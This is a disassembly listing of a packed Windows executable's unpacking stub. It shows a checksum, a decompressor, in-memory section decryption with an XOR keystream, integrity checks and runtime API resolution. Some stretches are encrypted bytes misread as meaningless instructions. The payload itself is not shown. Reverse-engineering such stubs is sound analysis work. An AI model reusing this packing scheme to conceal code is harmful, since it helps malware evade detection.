add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+5]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+6]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+7]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+8]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+9]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Ah]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Bh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Ch]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Dh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Eh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Fh]
add edi, esi
add esi, ebx
add edi, esi
add ecx, 10h
dec eax
jnz loc_4CCFC2
loc_4CD04B: ; CODE XREF: sub_4CCF6E+40�j
test edx, edx
jz short loc_4CD05A
loc_4CD04F: ; CODE XREF: sub_4CCF6E+EA�j
movzx eax, byte ptr [ecx]
add esi, eax
inc ecx
add edi, esi
dec edx
jnz short loc_4CD04F
loc_4CD05A: ; CODE XREF: sub_4CCF6E+DF�j
mov ebx, 0FFF1h
mov eax, esi
xor edx, edx
mov esi, ebx
div esi
mov eax, edi
mov esi, edx
xor edx, edx
div ebx
cmp [ebp+arg_8], 0
mov edi, edx
ja loc_4CCF9B
pop ebx
loc_4CD07C: ; CODE XREF: sub_4CCF6E+26�j
mov eax, edi
shl eax, 10h
or eax, esi
loc_4CD083: ; CODE XREF: sub_4CCF6E+1D�j
pop edi
pop esi
pop ebp
retn
sub_4CCF6E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CD090 proc near ; CODE XREF: sub_4CD2E0+15E�p
; sub_4CD2E0+33C�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_1C], ecx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
mov [edx+4], eax
mov ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
mov [ecx+8], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_C]
mov [eax+0Ch], ecx
mov edx, [ebp+var_1C]
mov dword ptr [edx+14h], 0
mov eax, [ebp+var_1C]
mov dword ptr [eax+10h], 0
mov [ebp+var_10], 0
jmp short loc_4CD0E2
; ---------------------------------------------------------------------------
loc_4CD0D9: ; CODE XREF: sub_4CD090+65�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_4CD0E2: ; CODE XREF: sub_4CD090+47�j
cmp [ebp+var_10], 0FEEh
jge short loc_4CD0F7
mov edx, [ebp+var_1C]
add edx, [ebp+var_10]
mov byte ptr [edx+18h], 20h
jmp short loc_4CD0D9
; ---------------------------------------------------------------------------
loc_4CD0F7: ; CODE XREF: sub_4CD090+59�j
mov [ebp+var_8], 0FEEh
mov [ebp+var_4], 0
loc_4CD105: ; CODE XREF: sub_4CD090:loc_4CD236�j
mov eax, [ebp+var_4]
shr eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
and ecx, 100h
test ecx, ecx
jnz short loc_4CD139
mov ecx, [ebp+var_1C]
call sub_4CD250
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_4CD130
jmp loc_4CD23B
; ---------------------------------------------------------------------------
loc_4CD130: ; CODE XREF: sub_4CD090+99�j
mov edx, [ebp+var_C]
or dh, 0FFh
mov [ebp+var_4], edx
loc_4CD139: ; CODE XREF: sub_4CD090+88�j
mov eax, [ebp+var_4]
and eax, 1
test eax, eax
jz short loc_4CD18A
mov ecx, [ebp+var_1C]
call sub_4CD250
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_4CD159
jmp loc_4CD23B
; ---------------------------------------------------------------------------
loc_4CD159: ; CODE XREF: sub_4CD090+C2�j
mov edx, [ebp+var_C]
mov ecx, [ebp+var_1C]
call sub_4CD290
mov ecx, [ebp+var_1C]
add ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_C]
mov [ecx+18h], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 0FFFh
mov [ebp+var_8], ecx
jmp loc_4CD236
; ---------------------------------------------------------------------------
loc_4CD18A: ; CODE XREF: sub_4CD090+B1�j
mov ecx, [ebp+var_1C]
call sub_4CD250
mov [ebp+var_10], eax
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_4CD1A0
jmp loc_4CD23B
; ---------------------------------------------------------------------------
loc_4CD1A0: ; CODE XREF: sub_4CD090+109�j
mov ecx, [ebp+var_1C]
call sub_4CD250
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_4CD1B6
jmp loc_4CD23B
; ---------------------------------------------------------------------------
loc_4CD1B6: ; CODE XREF: sub_4CD090+11F�j
mov edx, [ebp+var_14]
and edx, 0F0h
shl edx, 4
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_14]
and ecx, 0Fh
add ecx, 2
mov [ebp+var_14], ecx
mov [ebp+var_18], 0
jmp short loc_4CD1E8
; ---------------------------------------------------------------------------
loc_4CD1DF: ; CODE XREF: sub_4CD090+1A4�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_4CD1E8: ; CODE XREF: sub_4CD090+14D�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jg short loc_4CD236
mov ecx, [ebp+var_10]
add ecx, [ebp+var_18]
and ecx, 0FFFh
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+ecx+18h]
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
mov ecx, [ebp+var_1C]
call sub_4CD290
mov ecx, [ebp+var_1C]
add ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_C]
mov [ecx+18h], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 0FFFh
mov [ebp+var_8], ecx
jmp short loc_4CD1DF
; ---------------------------------------------------------------------------
loc_4CD236: ; CODE XREF: sub_4CD090+F5�j
; sub_4CD090+15E�j
jmp loc_4CD105
; ---------------------------------------------------------------------------
loc_4CD23B: ; CODE XREF: sub_4CD090+9B�j
; sub_4CD090+C4�j ...
mov edx, [ebp+var_1C]
mov eax, [edx+10h]
mov esp, ebp
pop ebp
retn 10h
sub_4CD090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CD250 proc near ; CODE XREF: sub_4CD090+8D�p
; sub_4CD090+B6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [eax+14h]
cmp edx, [ecx+8]
jb short loc_4CD26A
or eax, 0FFFFFFFFh
jmp short loc_4CD28B
; ---------------------------------------------------------------------------
loc_4CD26A: ; CODE XREF: sub_4CD250+13�j
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
mov eax, [edx+14h]
xor edx, edx
mov dl, [ecx+eax]
mov eax, edx
mov ecx, [ebp+var_4]
mov edx, [ecx+14h]
add edx, 1
mov ecx, [ebp+var_4]
mov [ecx+14h], edx
loc_4CD28B: ; CODE XREF: sub_4CD250+18�j
mov esp, ebp
pop ebp
retn
sub_4CD250 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CD290 proc near ; CODE XREF: sub_4CD090+CF�p
; sub_4CD090+17E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], edx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [eax+10h]
cmp edx, [ecx+0Ch]
jb short loc_4CD2AC
jmp short loc_4CD2CD
; ---------------------------------------------------------------------------
loc_4CD2AC: ; CODE XREF: sub_4CD290+18�j
mov eax, [ebp+var_4]
mov ecx, [eax+4]
mov edx, [ebp+var_4]
mov eax, [edx+10h]
mov dl, byte ptr [ebp+var_8]
mov [ecx+eax], dl
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx+10h], ecx
loc_4CD2CD: ; CODE XREF: sub_4CD290+1A�j
mov esp, ebp
pop ebp
retn
sub_4CD290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CD2E0 proc near ; CODE XREF: _4:loc_4CD700�p
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 70h
push esi
push edi
push 0
call ds:dword_4DE014 ; GetModuleHandleA
mov [ebp+var_18], eax
push 0D440h
push 40h
call ds:dword_4DE010 ; LocalAlloc
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
sub eax, 3FAh
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
sub ecx, 4
mov [ebp+var_10], ecx
mov [ebp+var_1C], 0
mov [ebp+var_44], 1
mov [ebp+var_30], 0
mov [ebp+var_3C], offset aBarier ; "BARIER"
loc_4CD333: ; CODE XREF: sub_4CD2E0+98�j
; sub_4CD2E0+A0�j
mov edx, [ebp+var_10]
mov eax, [edx]
imul eax, 28h
mov ecx, [ebp+var_4]
add ecx, eax
mov edx, [ebp+var_44]
imul edx, 28h
sub ecx, edx
mov [ebp+var_30], ecx
mov eax, [ebp+var_44]
add eax, 1
mov [ebp+var_44], eax
mov ecx, [ebp+var_30]
mov edx, [ebp+var_18]
add edx, [ecx+0Ch]
mov [ebp+var_40], edx
mov eax, [ebp+var_30]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov edx, [ebp+var_30]
add ecx, [edx+8]
mov [ebp+var_2C], ecx
mov eax, [ebp+var_40]
cmp eax, [ebp+var_3C]
ja short loc_4CD333
mov ecx, [ebp+var_3C]
cmp ecx, [ebp+var_2C]
jnb short loc_4CD333
mov edx, [ebp+var_40]
mov [ebp+var_20], edx
jmp short loc_4CD393
; ---------------------------------------------------------------------------
loc_4CD38A: ; CODE XREF: sub_4CD2E0+DA�j
mov eax, [ebp+var_40]
add eax, 4
mov [ebp+var_40], eax
loc_4CD393: ; CODE XREF: sub_4CD2E0+A8�j
mov ecx, [ebp+var_40]
cmp ecx, [ebp+var_2C]
jnb short loc_4CD3BC
mov edx, [ebp+var_20]
imul edx, 19660Dh
add edx, 3C6EF375h
mov [ebp+var_20], edx
mov eax, [ebp+var_40]
mov ecx, [eax]
xor ecx, [ebp+var_20]
mov edx, [ebp+var_40]
mov [edx], ecx
jmp short loc_4CD38A
; ---------------------------------------------------------------------------
loc_4CD3BC: ; CODE XREF: sub_4CD2E0+B9�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
mov eax, [edx]
mov [ebp+var_28], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
mov [ebp+var_38], edx
mov eax, [ebp+var_24]
mov ecx, [eax+8]
mov [ebp+var_34], ecx
mov edx, [ebp+var_38]
push edx
push 40h
call ds:dword_4DE010 ; LocalAlloc
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4CD400
cmp [ebp+var_38], 10000h
jbe short loc_4CD411
loc_4CD400: ; CODE XREF: sub_4CD2E0+115�j
push 0
push 0
push 0
push 0EF0000FEh
call ds:dword_4DE00C ; RaiseException
loc_4CD411: ; CODE XREF: sub_4CD2E0+11E�j
mov ecx, [ebp+var_38]
mov esi, [ebp+var_24]
add esi, 0Ch
mov edi, [ebp+var_1C]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_38]
push eax
mov ecx, [ebp+var_1C]
push ecx
mov ecx, [ebp+var_8]
call sub_4CD090
cmp eax, [ebp+var_28]
jz short loc_4CD459
push 0
push 0
push 0
push 0EF0000F8h
call ds:dword_4DE00C ; RaiseException
loc_4CD459: ; CODE XREF: sub_4CD2E0+166�j
mov edx, [ebp+var_28]
push edx
mov eax, [ebp+var_24]
push eax
push 0
call sub_4CCF6E
add esp, 0Ch
cmp eax, [ebp+var_34]
jz short loc_4CD481
push 0
push 0
push 0
push 0EF0000FAh
call ds:dword_4DE00C ; RaiseException
loc_4CD481: ; CODE XREF: sub_4CD2E0+18E�j
mov ecx, [ebp+var_1C]
push ecx
call ds:dword_4DE008 ; LocalFree
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4DE014 ; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_4CD4B0
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_4DE00C ; RaiseException
loc_4CD4B0: ; CODE XREF: sub_4CD2E0+1BD�j
push offset aFlushinstructi ; "FlushInstructionCache"
mov edx, [ebp+var_C]
push edx
call ds:dword_4DE004 ; GetProcAddress
mov ds:dword_4E1670, eax
push offset aGetcurrentproc ; "GetCurrentProcess"
mov eax, [ebp+var_C]
push eax
call ds:dword_4DE004 ; GetProcAddress
mov [ebp+var_14], eax
cmp ds:dword_4E1670, 0
jnz short loc_4CD4F0
push 0
push 0
push 0
push 0EF0000FCh
call ds:dword_4DE00C ; RaiseException
loc_4CD4F0: ; CODE XREF: sub_4CD2E0+1FD�j
call [ebp+var_14]
mov ds:dword_4E168C, eax
mov [ebp+var_48], 0
mov [ebp+var_68], 3
mov [ebp+var_58], 0
loc_4CD50D: ; CODE XREF: sub_4CD2E0+272�j
; sub_4CD2E0+27A�j
mov ecx, [ebp+var_10]
mov edx, [ecx]
imul edx, 28h
mov eax, [ebp+var_4]
add eax, edx
mov ecx, [ebp+var_68]
imul ecx, 28h
sub eax, ecx
mov [ebp+var_58], eax
mov edx, [ebp+var_68]
add edx, 1
mov [ebp+var_68], edx
mov eax, [ebp+var_58]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov [ebp+var_64], ecx
mov edx, [ebp+var_58]
mov eax, [ebp+var_18]
add eax, [edx+0Ch]
mov ecx, [ebp+var_58]
add eax, [ecx+8]
mov [ebp+var_54], eax
mov edx, [ebp+var_64]
cmp edx, [ebp+arg_0]
jnb short loc_4CD50D
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_54]
jnb short loc_4CD50D
mov ecx, [ebp+arg_0]
mov [ebp+var_64], ecx
mov edx, [ebp+var_64]
mov [ebp+var_4C], edx
mov eax, [ebp+var_64]
add eax, 0Ch
and al, 0FCh
mov [ebp+var_64], eax
jmp short loc_4CD57E
; ---------------------------------------------------------------------------
loc_4CD575: ; CODE XREF: sub_4CD2E0+2C4�j
mov ecx, [ebp+var_64]
add ecx, 4
mov [ebp+var_64], ecx
loc_4CD57E: ; CODE XREF: sub_4CD2E0+293�j
mov edx, [ebp+var_64]
cmp edx, [ebp+var_54]
jnb short loc_4CD5A6
mov eax, [ebp+var_4C]
imul eax, 19660Dh
add eax, 3C6EF375h
mov [ebp+var_4C], eax
mov ecx, [ebp+var_64]
mov edx, [ecx]
xor edx, [ebp+var_4C]
mov eax, [ebp+var_64]
mov [eax], edx
jmp short loc_4CD575
; ---------------------------------------------------------------------------
loc_4CD5A6: ; CODE XREF: sub_4CD2E0+2A4�j
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [ebp+var_50], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [ebp+var_60], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
mov [ebp+var_5C], eax
mov ecx, [ebp+var_60]
push ecx
push 40h
call ds:dword_4DE010 ; LocalAlloc
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_4CD5DE
cmp [ebp+var_60], 10000h
jbe short loc_4CD5EF
loc_4CD5DE: ; CODE XREF: sub_4CD2E0+2F3�j
push 0
push 0
push 0
push 0EF0000FFh
call ds:dword_4DE00C ; RaiseException
loc_4CD5EF: ; CODE XREF: sub_4CD2E0+2FC�j
mov ecx, [ebp+var_60]
mov esi, [ebp+arg_0]
add esi, 0Ch
mov edi, [ebp+var_48]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_60]
push edx
mov eax, [ebp+var_48]
push eax
mov ecx, [ebp+var_8]
call sub_4CD090
cmp eax, [ebp+var_50]
jz short loc_4CD637
push 0
push 0
push 0
push 0EF0000F9h
call ds:dword_4DE00C ; RaiseException
loc_4CD637: ; CODE XREF: sub_4CD2E0+344�j
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+arg_0]
push edx
push 0
call sub_4CCF6E
add esp, 0Ch
cmp eax, [ebp+var_5C]
jz short loc_4CD65F
push 0
push 0
push 0
push 0EF0000FBh
call ds:dword_4DE00C ; RaiseException
loc_4CD65F: ; CODE XREF: sub_4CD2E0+36C�j
mov eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, ds:dword_4E168C
push edx
call ds:dword_4E1670 ; FlushInstructionCache
mov eax, [ebp+var_48]
push eax
call ds:dword_4DE008 ; LocalFree
mov ecx, [ebp+var_8]
push ecx
call ds:dword_4DE008 ; LocalFree
push offset dword_4E1A28
call ds:dword_4DE000 ; InitializeCriticalSection
push offset dword_4E1930
call ds:dword_4DE000 ; InitializeCriticalSection
call sub_4CE2E0
push 80h
call sub_4D835A
add esp, 4
mov [ebp+var_6C], eax
cmp [ebp+var_6C], 0
jz short loc_4CD6C6
mov ecx, [ebp+var_6C]
call sub_4CDDD0
mov [ebp+var_70], eax
jmp short loc_4CD6CD
; ---------------------------------------------------------------------------
loc_4CD6C6: ; CODE XREF: sub_4CD2E0+3D7�j
mov [ebp+var_70], 0
loc_4CD6CD: ; CODE XREF: sub_4CD2E0+3E4�j
mov edx, offset dword_4CD720
mov eax, [ebp+var_70]
mov [edx+4], eax
call sub_4D8C17
mov ds:dword_4E60DC, eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
mov ds:dword_4E1698, edx
mov eax, [ebp+var_4]
mov ds:off_4E169C, eax
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_4CD2E0 endp
; ---------------------------------------------------------------------------
align 10h
loc_4CD700: ; CODE XREF: sub_4CDB8D�p
call sub_4CD2E0
pop eax
call loc_4CDE60
pop eax
mov [esp+24h], eax
popa
pop eax
pop eax
call eax
call sub_4DA0BC
; ---------------------------------------------------------------------------
db 6 dup(0CCh)
dword_4CD720 dd 0 ; DATA XREF: sub_4CD2E0:loc_4CD6CD�o
; sub_4D47BF+2B�o ...
db 90h
db 1Eh, 91h, 0
aHereisbootcode db 27h,'HEREISBOOTCODE',27h,0
align 10h
dw 7
unicode 0, <>,0
a_text db '.text',0 ; DATA XREF: _6:off_4E169C�o
align 4
db 90h
db 2 dup(2), 0
dd 1000h, 12400h, 400h, 3 dup(0)
dd 60000020h, 6164722Eh, 6174h, 1BB6h, 22000h, 1000h, 12800h
dd 3 dup(0)
dd 40000040h, 7461642Eh, 61h, 0A6720h, 24000h, 4000h, 13800h
dd 3 dup(0)
dd 0C0000040h, 6478732Eh, 617461h, 18h, 0CB000h, 200h
dd 17800h, 3 dup(0)
dd 0C0000240h, 7865742Eh, 74h, 11ABFh, 0CC000h, 0B600h
dd 17A00h, 3 dup(0)
dd 0E0000040h, 6164722Eh, 6174h, 0D76h, 0DE000h, 0E00h
dd 23000h, 3 dup(0)
dd 0E0000040h, 7461642Eh, 61h, 7110h, 0DF000h, 1C00h, 23E00h
dd 3 dup(0)
dd 0E0000040h, 0B3h dup(0)
dd 32000000h, 30353030h
db 35h, 31h, 38h
; ---------------------------------------------------------------------------
public start
start:
call $+5
pusha
call sub_4CDB8D
xchg eax, esp
sbb [esi-6E07B9B0h], ah
push ebp
setnbe byte ptr [edi+37h]
test al, 65h
and cl, [ecx-28h]
pusha
or al, [eax+373EFFA7h]
add [edi], edi
mov ebp, 0A5F40422h
pusha
enter 0FFFFB7D7h, 0BCh
sti
cmp [esi-4C522775h], esp
icebp
movsb
xchg eax, ebp
dec dword ptr [eax]
; ---------------------------------------------------------------------------
dw 0E98Dh
dd 0A71D3AFDh, 0E98D695Ch, 0A71D3AFDh
db 5Ch, 69h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_4CDB7E proc near ; CODE XREF: _4:004CDF39�p _4:004CECB0�p ...
jmp sub_4D489D
sub_4CDB7E endp
; ---------------------------------------------------------------------------
jmp loc_4D48B6
; ---------------------------------------------------------------------------
jmp loc_4D48B6
; =============== S U B R O U T I N E =======================================
sub_4CDB8D proc near ; CODE XREF: _4:004CDB39�p
call loc_4CD700
jmp sub_4DDAB0
sub_4CDB8D endp
; ---------------------------------------------------------------------------
jmp sub_4DDAB0
; ---------------------------------------------------------------------------
dd 0CBCB4CE9h, 0E452E9DBh, 0E7E9626Dh, 0E9234555h, 5988650h
dd 0BB205043h, 6DF64925h, 53E679A8h, 0E9C3AF96h, 20h, 0F3h
dd 2060400h, 9E6h, 5 dup(0)
dd 39289932h, 0DD93CC29h, 0A3A35AE3h, 4EA4B4Eh, 2E6D7A6Eh
dd 2E657865h, 584F42h, 71h dup(0)
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CDDD0 proc near ; CODE XREF: sub_4CD2E0+3DC�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], ecx
mov eax, [ebp+var_8]
mov dword ptr [eax+78h], 0
mov ecx, [ebp+var_8]
mov dword ptr [ecx+7Ch], 0
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4DE014 ; GetModuleHandleA
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_4CDE12
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_4DE00C ; RaiseException
loc_4CDE12: ; CODE XREF: sub_4CDDD0+2F�j
mov edx, [ebp+var_8]
push edx
call ds:dword_4DE000 ; InitializeCriticalSection
mov eax, [ebp+var_8]
add eax, 18h
push eax
call ds:dword_4DE000 ; InitializeCriticalSection
mov ecx, [ebp+var_8]
add ecx, 30h
push ecx
call ds:dword_4DE000 ; InitializeCriticalSection
mov edx, [ebp+var_8]
add edx, 48h
push edx
call ds:dword_4DE000 ; InitializeCriticalSection
mov eax, [ebp+var_8]
mov esp, ebp
pop ebp
retn
sub_4CDDD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4CDE50 proc near ; CODE XREF: sub_4D2DD0+50�p
push ebp
mov ebp, esp
mov eax, ds:dword_4E1688
mov al, [eax+70h]
pop ebp
retn
sub_4CDE50 endp
; ---------------------------------------------------------------------------
align 10h
loc_4CDE60: ; CODE XREF: _4:004CD706�p
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov eax, [ebp+8]
mov ds:dword_4E1688, eax
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4E1718 ; GetModuleHandleA
mov [ebp-8], eax
cmp dword ptr [ebp-8], 0
jnz short loc_4CDE99
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_4E1778 ; RaiseException
loc_4CDE99: ; CODE XREF: _4:004CDE86�j
push offset aVirtualalloc ; "VirtualAlloc"
mov ecx, [ebp-8]
push ecx
call ds:dword_4E1728 ; GetProcAddress
mov [ebp-0Ch], eax
cmp dword ptr [ebp-0Ch], 0
jnz short loc_4CDEC2
push 0
push 0
push 0
push 0EF0000FCh
call ds:dword_4E1778 ; RaiseException
loc_4CDEC2: ; CODE XREF: _4:004CDEAF�j
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4E1674, eax
push 4
push 2000h
call ds:dword_4E173C ; GetTickCount
xor edx, edx
mov ecx, 8000h
div ecx
push edx
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4E167C, eax
push 4
push 1000h
push 1000h
push 0
call dword ptr [ebp-0Ch]
mov ds:dword_4E1678, eax
mov edx, ds:dword_4E1674
mov dword ptr [edx], 19660Dh
mov eax, ds:dword_4E1678
mov dword ptr [eax], 3C6EF35Fh
mov dword ptr [ebp-14h], 0
mov dword ptr [ebp-4], 0
push 2E0000h
call sub_4CDB7E
adc eax, 3C65AC02h
cmpxchg [esi], cl
xchg edi, [edx+2E8519EFh]
cmp ecx, ebx
xchg eax, ecx
db 66h
out 0F9h, al ; AT 80287 data.
; 286 sends opcodes & operands and receives results.
mov [ecx+5Ch], ebp
dec edi
db 36h
pop edi
xlat
sbb ecx, [esi]
add [edx+7124A10Dh], eax
dec esp
xor [eax+73h], ecx
mov ds:48B5728Dh, al
db 3Eh
xor [ebx+78h], ecx
mov dl, 8Ah
fcomp qword ptr [eax+ebx*8-38h]
and eax, 8467D355h
xchg eax, ecx
sahf
and [ebp-136E3BBFh], al
or ah, [ebx-48D2FD85h]
inc edi
mov esp, 77849591h
add eax, 4C759C32h
pop ds
xchg eax, esi
push ds
cmp cl, [edi-1]
and al, 31h
db 3Eh
dec ebx
xor [ebp+72h], ah
; ---------------------------------------------------------------------------
aDmqqh?2rr3EUul db 'dqqH?23҅uE',8,'qEh',1Bh,0
db '!',0
db 0E8h, 0BCh, 0FBh
dd 9090FFFFh, 0C985C933h, 558BEE75h, 8D8D52E8h, 0FFFFFF18h
dd 41EFE8h, 216800h, 9BE80026h, 90FFFFFBh, 85C03390h, 6AEE75C0h
dd 840D8B08h, 51004E16h, 0FF188D8Dh, 94E8FFFFh, 68000046h
dd 26h, 0FFFB75E8h, 0DD7144FFh, 57C78D29h, 56C454C1h, 0E9957046h
dd 2E4E5B6Ch, 7725EB5Bh, 0ADF7793Fh, 0D11C487Eh, 0C097F072h
dd 3F5DFA9Bh, 75E9DCC2h, 0F7518C7h, 0B6514437h, 6D7A8355h
dd 0C0339090h, 0EE75C085h, 16840D8Bh, 118B004Eh, 0A1F05589h
dd 4E1684h, 4D89088Bh, 9468ECh, 0F3E80000h, 830000A2h
dd 858904C4h, 0FFFFFEFCh, 0FEFC958Bh, 9589FFFFh, 0FFFFFF14h
dd 25B9h, 8BC03300h, 0FFFF14BDh, 8BABF3FFh, 0FFFF1485h
dd 9400C7FFh, 8B000000h, 0FFFF148Dh, 15FF51FFh, 4E1738h
dd 0FF14958Bh, 428BFFFFh, 1680A310h, 85C7004Eh, 0FFFFFF10h
dd 0
; ---------------------------------------------------------------------------
mov ecx, ds:dword_4E1680
mov [ebp-10Ch], ecx
cmp dword ptr [ebp-10Ch], 0
jz short loc_4CE0E8
cmp dword ptr [ebp-10Ch], 1
jz short loc_4CE0F7
cmp dword ptr [ebp-10Ch], 2
jz short loc_4CE14E
jmp loc_4CE1EB
; ---------------------------------------------------------------------------
loc_4CE0E8: ; CODE XREF: _4:004CE0CF�j
mov dword ptr [ebp-0F0h], offset aWin32s ; "win32s"
jmp loc_4CE1EB
; ---------------------------------------------------------------------------
loc_4CE0F7: ; CODE XREF: _4:004CE0D8�j
mov edx, [ebp-0ECh]
cmp dword ptr [edx+8], 0
jnz short loc_4CE10F
mov dword ptr [ebp-0F0h], offset aWindows95 ; "Windows95"
jmp short loc_4CE149
; ---------------------------------------------------------------------------
loc_4CE10F: ; CODE XREF: _4:004CE101�j
mov eax, [ebp-0ECh]
cmp dword ptr [eax+8], 0Ah
jnz short loc_4CE127
mov dword ptr [ebp-0F0h], offset aWindows98 ; "Windows98"
jmp short loc_4CE149
; ---------------------------------------------------------------------------
loc_4CE127: ; CODE XREF: _4:004CE119�j
mov ecx, [ebp-0ECh]
cmp dword ptr [ecx+8], 5Ah
jnz short loc_4CE13F
mov dword ptr [ebp-0F0h], offset aWindowsme ; "WindowsMe"
jmp short loc_4CE149
; ---------------------------------------------------------------------------
loc_4CE13F: ; CODE XREF: _4:004CE131�j
mov dword ptr [ebp-0F0h], offset aWindows9xUnkno ; "Windows9x(unknown)"
loc_4CE149: ; CODE XREF: _4:004CE10D�j _4:004CE125�j ...
jmp loc_4CE1EB
; ---------------------------------------------------------------------------
